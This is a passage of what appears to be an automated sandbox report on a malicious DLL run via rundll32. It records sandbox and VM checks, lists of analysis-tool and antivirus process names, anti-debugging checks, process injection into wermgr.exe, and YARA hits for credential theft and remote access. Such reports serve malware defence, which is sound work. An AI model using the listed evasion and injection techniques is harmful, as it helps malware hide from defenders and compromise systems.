Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6636 Thread sleep count: 177 > 30
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\wermgr.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADB883 GetSystemInfo, 20_2_00ADB883
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD9DA8 FindFirstFileW,FindNextFileW, 20_2_00AD9DA8
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.9.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: VMware7,1
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.me
Source: YWUEZVG8.htm.26.dr Binary or memory string: ;" aria-hidden="true" class="js-content-viewer rapidnofollow" tabindex="-1"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/GrbIGl3XT7cxPkRfHGfS9A--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/rollingstone.com/1559327ca430d396aaa47b044ff6e77a.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px) Ov(h)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-politics)" data-test-locator="stream-item-category-label">Politics</div><div class="C($streamItemGray) Fz(12px) D(ib) Mb(4px) Lh(1)" id="stream-item-publisher_6" data-test-locator="stream-item-publisher">Rolling Stone</div><h3 class="LineClamp(2,2.6em) Mb(4px) Mb(0)--md1160 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a class="js-content-viewer rapidnofollow wafer-caas D(b) Td(n) Td(n):f C(--cobalt) C(--dory):h" data-uuid="a30448d9-3077-3ca5-a6b7-fbb569663620" href="/entertainment/trump-promises-violate-14th-amendment-193116065.html" data-ylk="itc:0;elm:hdln;elmt:ct;bpos:1;cpos:6;cposy:17;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;g:a30448d9-3077-3ca5-a6b7-fbb569663620;grpt:storyCluster;pkgt:cluster_all_img;pos:1;cnt_tpc:Politics;slk:Trump Promises to Violate 14th Amendment
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 Start: 10035315 End: 1003515E 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress, 3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h] 3_2_1001E0D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_3_00AC2297 mov eax, dword ptr fs:[00000030h] 20_3_00AC2297
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD1015 mov eax, dword ptr fs:[00000030h] 20_2_00AD1015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD21CD mov eax, dword ptr fs:[00000030h] 20_2_00AD21CD
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 190000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 160000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: D03C50
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 160000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 190000 protect: page read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 160000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1008DB50 cpuid 3_2_1008DB50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100A0AD0 GetCurrentThread,GetThreadTimes,GetSystemTimeAsFileTime,QueryPerformanceFrequency,QueryPerformanceCounter,GetCurrentProcess,GetProcessTimes,_errno,GetModuleHandleA,GetProcAddress, 3_2_100A0AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress, 3_2_10092180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADBB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW, 20_2_00ADBB4D
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.561647699.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.561647699.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY